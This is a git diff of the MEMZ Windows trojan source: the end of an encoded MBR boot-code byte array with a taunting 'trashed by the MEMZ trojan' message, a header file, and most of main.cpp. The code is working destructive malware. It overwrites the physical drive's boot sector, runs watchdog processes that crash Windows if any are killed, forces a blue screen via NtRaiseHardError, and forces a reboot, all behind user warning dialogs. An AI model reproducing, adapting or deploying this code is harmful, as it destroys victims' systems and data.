0x83, 0x91, 0x91, 0x91, 0x91, 0x05, 0x50, 0x04, 0x05, 0x48, + 0x10, 0x05, 0x5C, 0x04, 0x05, 0x27, 0x04, 0x05, 0x6A, 0x05, 0x05, 0x59, + 0x07, 0x05, 0x6D, 0x07, 0x01, 0xB8, 0x98, 0x00, 0x9F, 0xF1, 0x06, 0x99, + 0x73, 0x05, 0xAC, 0x93, 0x07, 0x7F, 0x06, 0x07, 0x7F, 0x4B, 0x82, 0xF1, + 0x11, 0x1F, 0x05, 0xAB, 0xFF, 0x08, 0xAA, 0xBB, 0x02, 0x50, 0xF9, 0x03, + 0x48, 0x05, 0x03, 0x4E, 0x05, 0x80, 0x11, 0x03, 0x53, 0x1C, 0x03, 0x70, + 0x18, 0x84, 0xEE, 0xE0, 0xE0, 0xEE, 0xEE, 0x03, 0x8D, 0x0C, 0x03, 0x98, + 0x08, 0x81, 0xE0, 0x00, 0x03, 0xA2, 0x1D, 0x03, 0xC0, 0x18, 0x04, 0x44, + 0x04, 0x81, 0xE0, 0xE0, 0x03, 0xDE, 0x0A, 0x80, 0xDD, 0x03, 0xE8, 0x27, + 0x04, 0x11, 0x1A, 0x83, 0x70, 0x70, 0x77, 0x77, 0x04, 0x2E, 0x0A, 0x04, + 0x37, 0x28, 0x04, 0x60, 0x1C, 0x80, 0x03, 0x04, 0x7D, 0x0B, 0x04, 0x87, + 0x28, 0x04, 0xC0, 0x0D, 0x04, 0xBD, 0x10, 0x80, 0x39, 0x04, 0xCE, 0x0B, + 0x04, 0xD8, 0x27, 0x05, 0x10, 0x0C, 0x0C, 0xD0, 0x0C, 0x05, 0x17, 0x08, + 0x05, 0x20, 0x0B, 0x05, 0x2A, 0x25, 0x05, 0x62, 0x06, 0x80, 0xF1, 0x05, + 0x57, 0x15, 0x05, 0x71, 0x07, 0x05, 0x72, 0x11, 0x05, 0x82, 0x2A, 0x05, + 0xAD, 0xFF, 0x06, 0xB1, 0xFF, 0x07, 0xB5, 0xAE, 0x81, 0x11, 0x11, 0x01, + 0x92, 0x4F, 0x00, 0xDC, 0xB5, 0x0E, 0xFC, 0x9C, 0x00, 0x4B, 0x54, 0x0A, + 0x59, 0x15, 0x12, 0x25, 0x0A, 0x84, 0x10, 0x0E, 0x0E, 0x0E, 0x0E, 0x12, + 0x40, 0x04, 0x12, 0x40, 0x08, 0x0A, 0x81, 0x1F, 0x80, 0x11, 0x0A, 0xA9, + 0x15, 0x12, 0x75, 0x09, 0x83, 0x00, 0xEE, 0xEE, 0xED, 0x0C, 0x04, 0x05, + 0x80, 0xDC, 0x0B, 0xB5, 0x04, 0x0A, 0xCD, 0x05, 0x0A, 0xD1, 0x41, 0x0C, + 0x01, 0x08, 0x82, 0xDD, 0xD0, 0xD0, 0x12, 0x99, 0x04, 0x12, 0xA1, 0x04, + 0x0A, 0x2F, 0x1B, 0x0B, 0x49, 0x10, 0x13, 0x10, 0x0E, 0x0B, 0x5E, 0x08, + 0x12, 0x9A, 0x04, 0x80, 0x00, 0x0B, 0x6C, 0x04, 0x03, 0x4F, 0x06, 0x0B, + 0x75, 0x1B, 0x0B, 0x99, 0x0F, 0x0B, 0x98, 0x0F, 0x13, 0x2E, 0x05, 0x12, + 0x9A, 0x05, 0x0C, 0x57, 0x07, 0x0C, 0xB1, 0x05, 0x0B, 0x74, 0x1C, 0x04, + 0x10, 0x1A, 0x82, 0xA0, 0xA0, 0xA0, 0x03, 0xDD, 0x04, 0x13, 0x83, 0x06, + 0x80, 0xCD, 0x13, 0x89, 0x05, 0x80, 0x7F, 0x0C, 0x64, 0x04, 0x13, 0xDB, + 0x06, 0x0C, 0x68, 0x1F, 0x0C, 0x30, 0x11, 0x0B, 0x72, 0x04, 0x04, 0x2C, + 0x05, 0x13, 0x32, 0x0B, 0x80, 0x77, 0x13, 0x91, 0x05, 0x80, 0x07, 0x14, + 0x2C, 0x05, 0x13, 0xE8, 0x18, 0x0C, 0x89, 0x15, 0x14, 0x55, 0x04, 0x88, + 0x03, 0x03, 0x03, 0x03, 0x33, 0x00, 0xEE, 0xEE, 0xDE, 0x12, 0xE2, 0x07, + 0x80, 0x0D, 0x0C, 0x64, 0x05, 0x81, 0x70, 0x70, 0x04, 0x2B, 0x04, 0x80, + 0x77, 0x0C, 0xB5, 0x1A, 0x05, 0x0E, 0x0E, 0x0C, 0xDD, 0x11, 0x84, 0x07, + 0xE0, 0xE0, 0xE0, 0xE0, 0x14, 0xC0, 0x04, 0x87, 0xE0, 0xE0, 0xE0, 0x00, + 0x70, 0x70, 0x70, 0x70, 0x14, 0xCC, 0x04, 0x80, 0x70, 0x04, 0xE5, 0x1B, + 0x81, 0xF1, 0x1F, 0x11, 0xCF, 0x05, 0x05, 0x50, 0x17, 0x80, 0x00, 0x14, + 0xD4, 0x04, 0x82, 0x01, 0x70, 0x70, 0x14, 0x38, 0x07, 0x15, 0x13, 0x05, + 0x15, 0x13, 0x0A, 0x05, 0xAD, 0xFF, 0x0F, 0xE2, 0xE7, 0x0F, 0xD9, 0x93, + 0x05, 0xAC, 0xFF, 0x16, 0x23, 0xA0, 0x17, 0xA5, 0x04, 0x08, 0x18, 0x4D, + 0x08, 0x14, 0x5B, 0x12, 0x20, 0xFF, 0x13, 0x1F, 0xAD, 0x81, 0x07, 0x07, + 0x13, 0xCE, 0x4A, 0x83, 0xA0, 0x07, 0x77, 0x70, 0x14, 0x1C, 0x4C, 0x84, + 0x03, 0x70, 0x70, 0x03, 0x33, 0x14, 0x6D, 0x34, 0x14, 0xA2, 0x1C, 0x81, + 0x90, 0x07, 0x14, 0xBF, 0x31, 0x05, 0x49, 0x1D, 0x15, 0x0E, 0xFF, 0x18, + 0x97, 0xFF, 0x08, 0x15, 0x94, 0x14, 0xF0, 0x07, 0x05, 0xAD, 0xFF, 0x16, + 0x2D, 0xFF, 0x20, 0x84, 0x4C, 0x0A, 0x50, 0x1E, 0x81, 0x44, 0x40, 0x1A, + 0x10, 0x30, 0x0A, 0xA0, 0x20, 0x1A, 0x60, 0x5A, 0x81, 0xD0, 0xD0, 0x22, + 0x38, 0x05, 0x0B, 0x21, 0x04, 0x21, 0xF1, 0x1B, 0x0B, 0x40, 0x19, 0x1B, + 0x49, 0x0A, 0x22, 0x34, 0x06, 0x1B, 0x0A, 0x07, 0x81, 0xDD, 0xEE, 0x14, + 0x18, 0x04, 0x03, 0xA6, 0x31, 0x81, 0xE0, 0x07, 0x03, 0x89, 0x04, 0x0B, + 0xAD, 0x06, 0x1B, 0xA1, 0x06, 0x1B, 0x5A, 0x26, 0x1B, 0x7F, 0x18, 0x81, + 0x0A, 0x0A, 0x1C, 0xA2, 0x04, 0x1B, 0x9D, 0x0B, 0x1B, 0xA9, 0x27, 0x0C, + 0x2F, 0x21, 0x22, 0xD1, 0x0B, 0x1B, 0xFC, 0x24, 0x0C, 0x7F, 0x1E, 0x80, + 0x30, 0x1C, 0x3E, 0x0A, 0x1C, 0x49, 0x27, 0x1C, 0x6F, 0x1C, 0x80, 0x90, + 0x23, 0x18, 0x06, 0x1C, 0x93, 0x2E, 0x05, 0x50, 0x1B, 0x15, 0x0E, 0xFF, + 0x10, 0xD9, 0xF8, 0x80, 0xF1, 0x26, 0x50, 0x4D, 0x00, 0x9E, 0x47, 0x82, + 0xF1, 0xF1, 0x1F, 0x26, 0xA2, 0x4E, 0x05, 0xAB, 0xFF, 0x06, 0xE0, 0xFF, + 0x21, 0xB6, 0xD3, 0x03, 0x49, 0x05, 0x22, 0x8E, 0x05, 0x03, 0x53, 0x35, + 0x0B, 0x58, 0x0E, 0x23, 0xC5, 0x08, 0x03, 0x9E, 0x3A, 0x0B, 0xA8, 0x0B, + 0x2A, 0x0A, 0x05, 0x03, 0xE8, 0x41, 0x0B, 0xF9, 0x08, 0x23, 0x71, 0x0B, + 0x04, 0x3C, 0x40, 0x23, 0xBC, 0x10, 0x04, 0x8C, 0x30, 0x23, 0xFC, 0x1C, + 0x24, 0x17, 0x05, 0x0C, 0xAE, 0x22, 0x80, 0x1F, 0x24, 0x40, 0x1D, 0x80, + 0x77, 0x24, 0x5E, 0x0C, 0x86, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x0C, 0xF4, 0x04, 0x29, 0x0C, 0x1B, 0x24, 0x90, 0x20, 0x2C, 0x7B, 0x05, + 0x2C, 0x6B, 0x05, 0x24, 0xAB, 0x0F, 0x00, 0x38, 0xFF, 0x2D, 0x19, 0x7F, + 0x2C, 0xFF, 0x4E, 0x27, 0x37, 0x98, 0x26, 0x9D, 0x9A, 0x05, 0xAD, 0xFF, + 0x25, 0xF5, 0x5A, 0x1F, 0x6F, 0x40, 0x0A, 0x20, 0x30, 0x19, 0xF0, 0x1E, + 0x80, 0x10, 0x0A, 0x6F, 0x31, 0x1A, 0x40, 0x20, 0x02, 0xF0, 0x80, 0x1A, + 0xE0, 0x18, 0x0D, 0x01, 0x04, 0x80, 0x60, 0x1A, 0xFD, 0x09, 0x03, 0x96, + 0x2A, 0x1B, 0x30, 0x18, 0x80, 0x0E, 0x03, 0xD9, 0x87, 0x1B, 0xD0, 0x18, + 0x33, 0x4A, 0x05, 0x04, 0x7D, 0x33, 0x14, 0x50, 0x19, 0x33, 0x9B, 0x04, + 0x04, 0xCD, 0x29, 0x30, 0xA1, 0x0A, 0x0C, 0xD1, 0x1F, 0x05, 0x1F, 0x25, + 0x1E, 0x89, 0x13, 0x2C, 0x60, 0x15, 0x05, 0x6C, 0x27, 0x08, 0x12, 0xFF, + 0x30, 0x33, 0xFD, 0x07, 0xBE, 0xFF, 0x2D, 0x1A, 0xFF, 0x2E, 0x19, 0x93, + 0x31, 0x36, 0x0B, 0x80, 0xF0, 0x31, 0x3C, 0xED, 0x0B, 0x19, 0x27, 0x1A, + 0xE0, 0x19, 0x81, 0x60, 0x60, 0x1A, 0xFB, 0x0B, 0x0B, 0x66, 0x2A, 0x32, + 0xA0, 0x18, 0x0B, 0xA8, 0x88, 0x33, 0x40, 0x1C, 0x0C, 0x4C, 0x34, 0x33, + 0x90, 0x1D, 0x80, 0x33, 0x0C, 0x9E, 0x1F, 0x35, 0xE0, 0x13, 0x0C, 0xD0, + 0x50, 0x24, 0x89, 0x1D, 0x0D, 0x3D, 0x1D, 0x0F, 0xD9, 0xFF, 0x06, 0xBC, + 0xFF, 0x0F, 0x88, 0xFF, 0x10, 0x84, 0xFF, 0x26, 0x54, 0xCA, 0x21, 0xC0, + 0xCA, 0x1A, 0xBA, 0x26, 0x22, 0xB0, 0x29, 0x1B, 0x09, 0x27, 0x2A, 0xD0, + 0x18, 0x42, 0x4A, 0x06, 0x13, 0x7E, 0x82, 0x2B, 0x70, 0x18, 0x14, 0x18, + 0x38, 0x2B, 0xC0, 0x19, 0x84, 0x09, 0x09, 0x09, 0x09, 0x39, 0x1C, 0x3E, + 0x4F, 0x14, 0xBD, 0x33, 0x05, 0x50, 0x1C, 0x24, 0xA9, 0x15, 0x80, 0xF1, + 0x15, 0x22, 0xFF, 0x16, 0x51, 0xFF, 0x17, 0x50, 0xFF, 0x18, 0x4D, 0xFF, + 0x36, 0x7C, 0xD2, 0x41, 0x00, 0xFF, 0x41, 0xFF, 0xAD, 0x1B, 0x9C, 0x34, + 0x42, 0xE0, 0x18, 0x80, 0x30, 0x1B, 0xE9, 0x37, 0x43, 0x30, 0x18, 0x84, + 0x09, 0x70, 0x70, 0x09, 0x39, 0x43, 0x4D, 0x50, 0x1C, 0x8D, 0x33, 0x43, + 0xD0, 0x1D, 0x43, 0xEE, 0x0C, 0x82, 0xF1, 0xF1, 0x1F, 0x24, 0xBA, 0x4F, + 0x46, 0x55, 0xD1, 0x1E, 0x3B, 0xFF, 0x01, 0x5B, 0x37, 0x05, 0xAD, 0xFF, + 0x16, 0x29, 0xFF, 0x4F, 0x30, 0x80, 0x19, 0xF0, 0xCA, 0x22, 0x8A, 0x26, + 0x1A, 0xE0, 0x29, 0x22, 0xD9, 0x27, 0x3A, 0x70, 0x17, 0x23, 0x17, 0x89, + 0x3B, 0x10, 0x20, 0x23, 0xC0, 0x30, 0x33, 0x90, 0x1F, 0x24, 0x0F, 0x81, + 0x4B, 0x99, 0x1B, 0x4B, 0xBD, 0x04, 0x44, 0x01, 0x05, 0x40, 0x84, 0x06, + 0x4B, 0xCC, 0x48, 0x2F, 0x50, 0xD0, 0x3F, 0xE2, 0x9D, 0x40, 0x81, 0x04, + 0x2F, 0x01, 0xFF, 0x05, 0xAD, 0xFF, 0x06, 0xFA, 0xFF, 0x50, 0x80, 0xE9, + 0x2A, 0x59, 0x27, 0x3A, 0x20, 0x26, 0x2A, 0xA6, 0x2A, 0x3A, 0x70, 0x23, + 0x2A, 0xF3, 0x7D, 0x52, 0x80, 0x2C, 0x33, 0x6C, 0x3B, 0x80, 0x3F, 0x52, + 0xE8, 0x10, 0x2B, 0xE8, 0x27, 0x53, 0x1F, 0x16, 0x80, 0xF9, 0x5B, 0x02, + 0x04, 0x2C, 0x2A, 0x35, 0x53, 0x6F, 0x15, 0x80, 0xF1, 0x5B, 0x45, 0x05, + 0x80, 0xF1, 0x2C, 0x7B, 0x31, 0x08, 0x4A, 0xFF, 0x57, 0x90, 0x97, 0x5C, + 0xD1, 0x4F, 0x5D, 0x22, 0x4F, 0x87, 0x7E, 0x27, 0x12, 0x27, 0x4C, 0x46, + 0xB8, 0x44, 0x5D, 0xC0, 0x05, 0x8E, 0x26, 0xB8, 0x24, 0x34, 0x24, 0xBF, + 0x23, 0x34, 0x24, 0x00, 0x25, 0xB8, 0x44, 0x4C, 0x46, 0x5D, 0xC0, 0x08, + 0x5D, 0xD4, 0x05, 0xA0, 0x24, 0x34, 0x24, 0x89, 0x23, 0xBF, 0x23, 0x89, + 0x23, 0x34, 0x24, 0x4C, 0x46, 0x9D, 0x45, 0x7E, 0x27, 0x7E, 0x27, 0x70, + 0x49, 0xF0, 0x27, 0x68, 0x28, 0x70, 0x29, 0x70, 0x69, 0x68, 0x48, 0xF0, + 0x47, 0x5D, 0xFE, 0x06, 0x87, 0x68, 0x28, 0x7E, 0x27, 0x4C, 0x26, 0x9D, + 0x25, 0x5E, 0x12, 0x04, 0x5E, 0x10, 0x04, 0x5E, 0x0E, 0x04, 0x85, 0x70, + 0x29, 0x7E, 0x47, 0x4C, 0x46, 0x5E, 0x16, 0x0C, 0x83, 0xF0, 0x27, 0x7E, + 0x27, 0x5E, 0x0A, 0x08, 0x81, 0xF0, 0x47, 0x5E, 0x0E, 0x08, 0x5E, 0x46, + 0x04, 0x5E, 0x3C, 0x05, 0x84, 0x48, 0x70, 0x49, 0x68, 0x48, 0x5D, 0xF4, + 0x66, 0x85, 0x70, 0x49, 0x99, 0x2C, 0x39, 0x2B, 0x5E, 0xC0, 0x06, 0x5E, + 0xAA, 0x06, 0x83, 0x70, 0x29, 0x12, 0x27, 0x5D, 0xC8, 0x06, 0x81, 0x70, + 0x49, 0x5E, 0xC6, 0x08, 0x81, 0x99, 0x2C, 0x5E, 0xD4, 0x04, 0x5E, 0xB6, + 0x04, 0x87, 0x99, 0x2C, 0xFB, 0x2E, 0x24, 0x2E, 0x99, 0x2C, 0x5E, 0xC0, + 0x0E, 0x5E, 0xCC, 0x08, 0x5F, 0x00, 0x04, 0x5E, 0xF6, 0x04, 0x83, 0x70, + 0x29, 0x00, 0x2A, 0x5F, 0x0C, 0x06, 0x5E, 0xD2, 0x0C, 0x81, 0x00, 0x4A, + 0x5E, 0xC0, 0x6C, 0xBC, 0x68, 0x48, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x63, + 0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x68, 0x61, 0x73, 0x20, + 0x62, 0x65, 0x65, 0x6E, 0x20, 0x74, 0x72, 0x61, 0x73, 0x68, 0x65, 0x64, + 0x20, 0x62, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x45, 0x4D, 0x5A, + 0x20, 0x74, 0x72, 0x6F, 0x6A, 0x61, 0x6E, 0x2E, 0x20, 0x4E, 0x6F, 0x77, + 0x20, 0x65, 0x6E, 0x6A, 0x6F, 0x5F, 0xBC, 0x06, 0x8A, 0x4E, 0x79, 0x61, + 0x6E, 0x20, 0x43, 0x61, 0x74, 0x2E, 0x2E, 0x2E +}; + +const size_t code1_len = sizeof(code1); +const size_t code2_len = sizeof(code2); +const size_t msg_len = sizeof(msg); #endif \ No newline at end of file diff --git a/VCProject/MEMZ/data.h b/WindowsTrojan/MEMZ/data.h similarity index 95% rename from VCProject/MEMZ/data.h rename to WindowsTrojan/MEMZ/data.h index 4cf58b7..5e5ae12 100644 --- a/VCProject/MEMZ/data.h +++ b/WindowsTrojan/MEMZ/data.h @@ -1,22 +1,22 @@ -#pragma once -#include "memz.h" - -extern const char *sites[]; -extern const char *sounds[]; - -extern const size_t nSites; -extern const size_t nSounds; - -#ifndef CLEAN -extern const unsigned char code1[]; -extern const unsigned char code2[]; - -extern const size_t code1_len; -extern const size_t code2_len; - -extern const unsigned char msg[]; -extern const char *msgs[]; - -extern const size_t msg_len; -extern const size_t nMsgs; +#pragma once +#include "memz.h" + +extern const char *sites[]; +extern const char *sounds[]; + +extern const size_t nSites; +extern const size_t nSounds; + +#ifndef CLEAN +extern const unsigned char code1[]; +extern const unsigned char code2[]; + +extern const size_t code1_len; +extern const size_t code2_len; + +extern const unsigned char msg[]; +extern const char *msgs[]; + +extern const size_t msg_len; +extern const size_t nMsgs; #endif \ No newline at end of file diff --git a/VCProject/MEMZ/main.cpp b/WindowsTrojan/MEMZ/main.cpp similarity index 96% rename from VCProject/MEMZ/main.cpp rename to WindowsTrojan/MEMZ/main.cpp index 7c6ca52..d578acd 100644 --- a/VCProject/MEMZ/main.cpp +++ b/WindowsTrojan/MEMZ/main.cpp @@ -1,378 +1,378 @@ -#include "memz.h" - -#ifdef CLEAN -HWND mainWindow; // In the main window, in the main window, in the main window, ... -HFONT font; -HWND dialog; -#endif - -void main() { -#ifndef CLEAN - int argc; - LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc); - - if (argc > 1) { - if (!lstrcmpW(argv[1], L"/watchdog")) { - CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL); - - WNDCLASSEXA c; - c.cbSize = sizeof(WNDCLASSEXA); - c.lpfnWndProc = WindowProc; - c.lpszClassName = "hax"; - c.style = 0; - c.cbClsExtra = 0; - c.cbWndExtra = 0; - c.hInstance = NULL; - c.hIcon = 0; - c.hCursor = 0; - c.hbrBackground = 0; - c.lpszMenuName = NULL; - c.hIconSm = 0; - - RegisterClassExA(&c); - - HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL); - - MSG msg; - while (GetMessage(&msg, NULL, 0, 0) > 0) { - TranslateMessage(&msg); - DispatchMessage(&msg); - } - } - } else { - // Another very ugly formatting - if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\ -This malware will harm your computer and makes it unusable.\r\n\ -If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\ -If you know what this malware does and are using a safe environment to test, \ -press Yes to start it.\r\n\r\n\ -DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES || -MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\ -THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\ -STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) { - ExitProcess(0); - } - - wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2); - GetModuleFileName(NULL, fn, 8192); - - for (int i = 0; i < 5; i++) - ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT); - - SHELLEXECUTEINFO info; - info.cbSize = sizeof(SHELLEXECUTEINFO); - info.lpFile = fn; - info.lpParameters = L"/main"; - info.fMask = SEE_MASK_NOCLOSEPROCESS; - info.hwnd = NULL; - info.lpVerb = NULL; - info.lpDirectory = NULL; - info.hInstApp = NULL; - info.nShow = SW_SHOWDEFAULT; - - ShellExecuteEx(&info); - - SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS); - - ExitProcess(0); - } - - HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); - - if (drive == INVALID_HANDLE_VALUE) - ExitProcess(2); - - unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536); - - // Join the two code parts together - int i = 0; - for (; i < code1_len; i++) - *(bootcode + i) = *(code1 + i); - for (i = 0; i < code2_len; i++) - *(bootcode + i + 0x1fe) = *(code2 + i); - - DWORD wb; - if (!WriteFile(drive, bootcode, 65536, &wb, NULL)) - ExitProcess(3); - - CloseHandle(drive); - - HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); - - if (note == INVALID_HANDLE_VALUE) - ExitProcess(4); - - if (!WriteFile(note, msg, msg_len, &wb, NULL)) - ExitProcess(5); - - CloseHandle(note); - ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT); - - for (int p = 0; p < nPayloads; p++) { - Sleep(payloads[p].startDelay); - CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); - } - - for (;;) { - Sleep(10000); - } - -#else // CLEAN - InitCommonControls(); - - dialog = NULL; - - LOGFONT lf; - GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf); - font = CreateFont(lf.lfHeight, lf.lfWidth, - lf.lfEscapement, lf.lfOrientation, lf.lfWeight, - lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet, - lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality, - lf.lfPitchAndFamily, lf.lfFaceName); - - WNDCLASSEX c; - c.cbSize = sizeof(WNDCLASSEX); - c.lpfnWndProc = WindowProc; - c.lpszClassName = L"MEMZPanel"; - c.style = CS_HREDRAW | CS_VREDRAW; - c.cbClsExtra = 0; - c.cbWndExtra = 0; - c.hInstance = NULL; - c.hIcon = 0; - c.hCursor = 0; - c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1); - c.lpszMenuName = NULL; - c.hIconSm = 0; - - RegisterClassEx(&c); - - RECT rect; - rect.left = 0; - rect.right = WINDOWWIDTH; - rect.top = 0; - rect.bottom = WINDOWHEIGHT; - - AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE); - - mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, - 50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL); - - for (int p = 0; p < nPayloads; p++) { - payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY, - (p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT, - mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL); - SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE); - - CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); - //CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL); - } - - SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE); - - ShowWindow(mainWindow, SW_SHOW); - UpdateWindow(mainWindow); - - CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL); - - MSG msg; - while (GetMessage(&msg, NULL, 0, 0) > 0) { - if (dialog == NULL || !IsDialogMessage(dialog, &msg)) { - TranslateMessage(&msg); - DispatchMessage(&msg); - } - } -#endif -} - -#ifndef CLEAN -LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { - if (msg == WM_CLOSE || msg == WM_ENDSESSION) { - killWindows(); - return 0; - } - - return DefWindowProc(hwnd, msg, wParam, lParam); -} - -DWORD WINAPI watchdogThread(LPVOID parameter) { - int oproc = 0; - - char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512); - GetProcessImageFileNameA(GetCurrentProcess(), fn, 512); - - Sleep(1000); - - for (;;) { - HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); - PROCESSENTRY32 proc; - proc.dwSize = sizeof(proc); - - Process32First(snapshot, &proc); - - int nproc = 0; - do { - HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID); - char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512); - GetProcessImageFileNameA(hProc, fn2, 512); - - if (!lstrcmpA(fn, fn2)) { - nproc++; - } - - CloseHandle(hProc); - LocalFree(fn2); - } while (Process32Next(snapshot, &proc)); - - CloseHandle(snapshot); - - if (nproc < oproc) { - killWindows(); - } - - oproc = nproc; - - Sleep(10); - } -} - -void killWindows() { - // Show cool MessageBoxes - for (int i = 0; i < 20; i++) { - CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL); - Sleep(100); - } - - killWindowsInstant(); -} - -void killWindowsInstant() { - // Try to force BSOD first - // I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)... - // This isn't even an exploit, it's just an undocumented feature. - HMODULE ntdll = LoadLibraryA("ntdll"); - FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege"); - FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError"); - - if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) { - BOOLEAN tmp1; DWORD tmp2; - ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1); - ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2); - } - - // If the computer is still running, do it the normal way - HANDLE token; - TOKEN_PRIVILEGES privileges; - - OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token); - - LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid); - privileges.PrivilegeCount = 1; - privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - - AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0); - - // The actual restart - ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK); -} - -DWORD WINAPI ripMessageThread(LPVOID parameter) { - HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); - MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND); - UnhookWindowsHookEx(hook); - - return 0; -} -#else // CLEAN -LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { - PAINTSTRUCT ps; - HDC hdc; - - if (msg == WM_ACTIVATE) { - if (wParam == NULL) - dialog = NULL; - else - dialog = hwnd; - } else if (msg == WM_DESTROY) { - ExitProcess(0); - } else if (msg == WM_COMMAND) { - if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) { - for (int p = 0; p < nPayloads; p++) { - if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) { - SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL); - // Most ugly formatting EVER - if (MessageBoxA(hwnd, - "This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\ -If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \ -virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\ -Do you still want to enable it?", -"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) { - SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL); - } - } - } - } - } else if (msg == WM_PAINT) { - hdc = BeginPaint(hwnd, &ps); - SelectObject(hdc, font); - LPWSTR str; - LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED"; - FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY, - L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state); - - TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str)); - TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65); - - EndPaint(hwnd, &ps); - } else { - return DefWindowProc(hwnd, msg, wParam, lParam); - } - - return 0; -} - -DWORD WINAPI keyboardThread(LPVOID lParam) { - for (;;) { - if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 